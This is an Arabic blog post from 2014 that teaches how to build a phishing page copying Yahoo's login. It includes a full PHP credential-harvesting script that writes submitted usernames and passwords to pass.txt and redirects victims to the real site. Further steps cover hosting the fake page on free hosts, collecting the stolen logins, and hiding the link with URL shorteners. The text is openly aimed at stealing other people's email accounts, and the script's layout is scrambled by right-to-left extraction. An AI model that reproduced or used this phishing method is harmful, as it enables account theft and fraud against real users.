طريقة عمل صفحة مزورة
الصفحات المزورة هي طريقة مشهورة جدا و صار الكثير يعملون بها و هي طريقة تعمل على غباء
الضحية لكن احيانا ذكاء الهاكر يفيد كثيرا في اقناع الضحية حتى و لو كان هاكر مثله لكن هناك
طريقة العمل بالصفحات المزورة بدون اقناع الضحية بالدخول و ما الى غير ذلك و هي طريقة
احترافية و خطيرة حتى اني اظن ان كبار الهكر يتم سرقة ايميلهم بهذه الطريقة
ساشرح لكم الن طبيعة عمل هذه الصفحات ...كيفية و صول التبليغ ....
طبعا كما نعرف ان في الصفحات المزورة التبليغ يصلك انا في صفحات بيضاء و انا افضلها و
يصلك التبليغ في اليميل .. انا ل احب هذه الطريقة لني عندما اسرق ايميل ل احب ان ادخل
ايميلي لرؤية المعلومات ثم اغلقه ثم اعادة فتحه ... يمكنك فتح اليميل في متصفح اخر
كالفايرفوكس حيث تعمل بمتصفحية مثل الوبرا و الفايرفوكس .. الول فيه ايميلك مفتوح و الثاني
ايميل الضحية لكن عند كثرة الضحايا مثل خمس ضحايا مرة واحدة لن تقوم انت طبعا باستعمال
خمس متصفحات لذا فتضع الضحايا يصلونك في صفحة اخرى بيضاء .........
كيفية
اول و قبل كل شيئ عليك معرفة الصفحة التي تريد تزويرها مثل ياهوو . هوتميل . جمايل.
فيس بوك.................
انا ساشرح على صفحة الياهوو لكن ااكد لكم ان كل الصفحات تزور بنفس الطريقة ....
سياخذك الى الصفحة التالية و هي صفحة ادخال mail اول ندخل موقع الياهوو و نضغط على
https://login.yahoo.com/config/mail?.src=ym&.intl=fr اليميل و الباس و هي على الرابط التالي
اوك نروح نحمل الصفحة تابع الصورة التالية .....
الن نقوم بتحميل الصفحة كاملة
الن هاهي الصفحة مع الصور التي تحتويها ...
الن ننتقل الى اهم خطوةو هي تزوير الصفحة ...
f نفتحها بالمفكرة و نضعط على 3 mail.htm حسنا نروح للصفحة المسماة عندي
او
action راح تظهر لنا صفحة للبحث نكتب كلمة trl+f C
تابع الصورة...........................
اما الرابط get نروح و نغيرها ل post نشاهد بجاني الكلمة action خلص عملنا بحث لكلمة
هذه الخطورة code.php نروح نغيره ?https://login.yahoo.com/config/login الذي من الجهة الخرى
مهمة جدا فركز .. انظر الصورة التالية و هي صورة للملف بعد التغيير.........
اظن الصورة واضحة و الطريقة واضحة .... يا اخي اذا لم تفهم هذا فلن تفعل شيئا
اوك ل تستعجل لن ذلك ... code.php اكن لو كنت مكانكم ستتساؤلون لماذا غيرنا الرابط الى
هو الكود الذي سنستعمله في ارسال المعلومات .....
اليك الكود....
php?>
;("handle = fopen("pass.txt", "a$
} (foreach($_GET as $variable => $value
;(fwrite($handle, $variable
;("=" ,fwrite($handle
;(fwrite($handle, $value
;("fwrite($handle, "\r\n
;"redirect = "https://login.yahoo.com/config/mail?.src=ym&.intl=fr$
;(" header("Location:$redirect
{
;("fwrite($handle, "\r\n
fclose($handle ;(e; xit
<?
اوك اشرح لكم الكود
انتم ترون الرابط هو لفحة الياهو أي الموقع الذي يؤخذ له الضحية بعد ادخال المعلومات اما فوق
و هو الصفحة التي يصلك فيها التبليغ ...... اما غير ذلك فل يهمنا .. pass.txt كما تجدون كلمة
code.php نفتح مفكرة و ننقله فيها كما هو و نحفظه بالسم الذي وضعناه في الصفحة المزورة أي
لم شيئا .............
أي عند ادخال الضحية للمعلومات code.php ساشرح لكم .. اول وضعنا في الصفة الزورة
سيرسلك انت و المعلومات الى الكود و الكود سيرسل المعلومات الى الملف
و يرسل الضحية الى الموقع الذي كتبته انت فوق و من الفضل ان pass.txt
تكتب الموقع الرئيسي للصفحة حتى يظن الضحية انه اخطا في ادخال
code.php معلوماته ........ اوك احنا زورنا الصفحة و حفظنا الكود باسم
بنفس المجلد اللي عليه الصفحة .
انظر الصورة الصورة ....... pass.txt ..نروح نعمل ملف تكست جديد نسميه
الن نهينا تزوير الصفحة .تمااااااام ...الن نرفع الصفحة على استضافة و طبعا
مجانية لننا لن نرفع صفحة مزورة على استضافة مدفوعة.....
فهي freehostia.com ليكن في علمك ان الستضافات المجانية كثيرة جدا لكن انا انصحكم ب
الفضل للصفحلت المزورة اعني ل اعلنات و ل شيئ نروح ندخل الموقع
و نسجل . تابع الصورة....... http://www.freehostia.com
راح تظهر لنا الصفحة التالية......................
انظر الصورة في الصفحة الموالية....
أي دومين use sub domain اول نترك الخانة الولى كما هي 0.00 و الخانة الموالية نكتب
مجاني
و راح يكون الدومين V1ru راح تظهر لنا خانة نكتب فيها اسم الدومين مثل 5
v1ru5.freehostia.com
اما في الجزء الثاني نمل الخانات المرقمة بالشكل التالي....
--1 البلد
--2 اكتب اي شيئ
--3 اكتب اسمك
--4 اكتب لقبك
--5 اكتب ايميلك و هو ضروري صدقني
--6 رقم الهاتف
7و 8--اكتب اي شيئ
--9 اختر واحدة
--10 رقم بلدك
ثم عندما نمل الخانات راح تظهر لنا صورة فيها احرف و ارقام ل تظهر عندي في الصورة
راح تظهر الصورة التالية .... continue ندخل الرقام و الحروف و نضغط على
بعد ما ينتهي راح تظهر لنا صفحة بهذا الشكل و ان لم تظهر فلقد اخطات بادخال المعلومات
تابع...
الن مبروك تسجيلك في الستضافة ..........
اذهب الن الى اليميل الذي سجلت به سوف تجد رسالة وصلتك من الستضافة و فيها معلومات
دخلولك الى الستضافة تابع الصورة في الصفحة المقابلة ليس في الصورة ما يشرح ابدا فهي
واضحة وضوح الشمس .........
هي اسمك في الستضافة انا باسس فهو الباسوورد login اوك راح اشرحلكم كما ترون كلمة
الذي تدخلون به للستضافة و فوق تجدون اسم الدومين الخاص بكم ...........................
اوك الن تمام سجلنا ............
نروح ندخل موقع الستضافة مرة اخرى و ندخل فوق اليوز الذي ارسلوه لكم في اليميل
تابعوووواااا الصورة .............. file manager راح ندخل للوحة التحكم ثم
راح تظهر لنا الصفحة نرى فيها اسم الدومين الخاص بنا . نروح نضغط عليه تاااابع الشرح
لختيار الصفحة و الكود و الملف تكست و ل ننسى الصور التي مع الصفحة browse نروح ل
..... upload ثم بعد اختيار الصفحة نضغط على
yourdomain.freehostia.com/mail.htm و الرفع نروح للرابط التالي
هو اسم الدومين اللي yourdomain هو اسم الصفحة التي ترسلونها للضحية و Mail.htm
سجلتوا به.....
yourdomain.freehostia.com/pass.txt اما ايميلت الضحايا توصل في الرابط التالي
هو اسم الملف تكست اللي رفعناه pass طبعا
الن نشوف مثال عن صفحة التبليغ
تمام الن زورنا الصفحة و رفعناها لكن هل سترسل الصفحة بذلك الرابط الطويل .. سيشك
اليك جملة من المواقع لختصار الرابط
easyURL.net
Korta ner din url
www.tighturl.com
www.ataja.es
. SimURL.com - Make a shorter URL. Then track it
Create a short URL | URL Redirection Services | HyperURL.com
Redirx
! dwarfURL - Make your long URL's a lot smaller with dwarfURL's short URL service
! IX.lt - shorten your URL for FREE
www.curio.us
StartUrl - Small url generator and url redirection
URL Hawk - Instant Short URL
! Welcome to canurl.com
DecentURL - Making ugly URLs decent
NanoRef.com
www.dot.tk
http://www.9hz.com
/http://nutshellurl.com
/http://funkyfilters.com/url/obfuscation
و اذا لم تعجبك الستضافة اليك مجموعة من الستضافات المجانية
www.ripway.com
http://www.11mbit.de
http://www.110mb.com
http://www.35mb.com
/http://www.da_insane.boo.pl/d/upload
http://www.filebuffer.net
http://www.filecabi.net/free-video-hosting.html
http://www.filesupload.com
http://www.fileupyours.com
http://www.freeuploader.com
http://www.myfilestash.com
http://www.mytempdir.com
http://www.picapic.net
http://www.putfile.com
www.webng.com
www.eb2a.com
www.freehostia.com
www.sqweebs.com
www.freeweb7.com
www.webng.com
www.asphost4free.com
www.websamba.com
www.titanichost.com
يمكنكم استعمال اية واحدة منها
ليست مجربة كلها لكن ااكد لكم ان فيها ما ينفع لكن افضلهم و اريد ان اقول لكم شيئا حول
انهما يعطيانك مساحة مجانية تقدر ب 5 جيجا www.p2h.info و الستضافة www.eb2a.com الستضافة
و هي دائمة أي ليست مثل البقية التي تعطيك مساحة ما لمدة معينة .....
السبت، 22 فبراير 2014
احتراف حماية و اختراق اليميل 2014
الاشتراك في:
تعليقات الرسالة (Atom)
ليست هناك تعليقات:
إرسال تعليق